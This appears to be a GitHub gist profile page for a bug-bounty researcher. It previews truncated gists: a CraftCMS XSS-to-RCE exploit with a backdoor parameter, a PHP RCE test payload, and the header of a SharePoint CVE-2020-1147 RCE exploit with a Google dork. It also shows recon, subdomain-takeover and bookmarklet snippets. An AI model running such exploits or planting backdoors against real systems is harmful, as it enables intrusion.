🐢
Building a better world, one line of code at a time

0xcrypto

@0xcrypto
0xcrypto / exploit.html
Created March 12, 2023 15:08
CraftCMS xss to rce chain exploit
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
// usage: exploitRCE()
function exploitRCE(
adminPanelUrl = '/index.php?p=admin/',
adminPanelDefaultUrl = '/admin/',
backdoor = 'backdoor',
twigTemplateExt = "text/html",
@0xcrypto
0xcrypto / index.twig
Created March 12, 2023 15:06
CraftCMS chain
<h1>{{entry.title}}</h1>
{% set rel = entry.asset.one() %}
{% if rel %}
<p><a href="{{ rel.url }}">{{ rel.filename }}</a></p>
@0xcrypto
0xcrypto / testpage.twig
Created March 12, 2023 14:53
Test page script
{% macro errorList(errors) %}
{% if errors %}
<ul class="errors">
{% for error in errors %}
<li>{{ error }}</li>
{% endfor %}
</ul>
{% endif %}
{% endmacro %}
@0xcrypto
0xcrypto / sdto.json
Last active February 18, 2023 12:55
[
{
"cicd_pass": true,
"cname": ["us-east-1.elasticbeanstalk.com"],
"discussion": "[Issue #194](https://github.com/EdOverflow/can-i-take-over-xyz/issues/194)",
"documentation": "",
"fingerprint": "NXDOMAIN",
"nxdomain": true,
"service": "AWS/Elastic Beanstalk",
"status": "Vulnerable",
@0xcrypto
0xcrypto / rce.php
Created March 9, 2021 15:01
RCE payload test
<?php
echo phpinfo();
exit()
?>
@0xcrypto
0xcrypto / recon.sh
Last active October 20, 2022 00:53
#!/usr/bin/env zsh
rm ~/bugbounty -rf
mkdir ~/bugbounty
cd ~/bugbounty
curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"
cat chaos-bugbounty-list.json | grep '"name"' | awk '{$1=$1};1' | sed 's/"name": "//g' | sed 's/"name":"//g' | sed 's/",//g' | while read folder; do mkdir -p $folder -v; done
for (( i=0; i < $(cat chaos-bugbounty-list.json | jq -r .programs | jq length); i++ ))
do
cat chaos-bugbounty-list.json | jq --arg i "$i" -r ".programs[($i | tonumber)].domains | .[]" > "$(cat chaos-bugbounty-list.json | jq --arg i "$i" -r '.programs[($i | tonumber)].name')/assets.txt" && echo -n "."

Keybase proof

I hereby claim:

  • I am 0xcrypto on github.
  • I am 0xcrypto (https://keybase.io/0xcrypto) on keybase.
  • I have a public key ASCFLpfkpOKtDDLe271f4wv8V-MdNxg139xm1qeXcoXVFAo

To claim this, I am signing this object:

import json, asyncio, pickle, os
from pathlib import Path
from takeover.takeover import takeover
home = str(Path.home())
# config is a dictionary. See ~/.config/takeover/config.json for structure
config = json.load(open(home + "/.config/takeover/config.json"))
# Do not forget to replace pointer to fingerprints with the valid data. See ~/.config/takeover/fingerprints.json for structure
@0xcrypto
0xcrypto / CVE-2020-1147.py
Created March 18, 2021 04:43
SharePoint Authenticated (Low Privileged) RCE Exploit
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
@0xcrypto
0xcrypto / bookmarklet.js
Last active March 17, 2021 12:23
Google Links Extractor (extracts links from the visible page; drag to the bookmark bar to create a bookmarklet)
javascript:alert((function() {links=[];document.querySelectorAll('.yuRUbf').forEach(function (e) {e.childNodes.forEach(function (f) {links.push(f.getAttribute('href'));});});return links;})().join("\n"))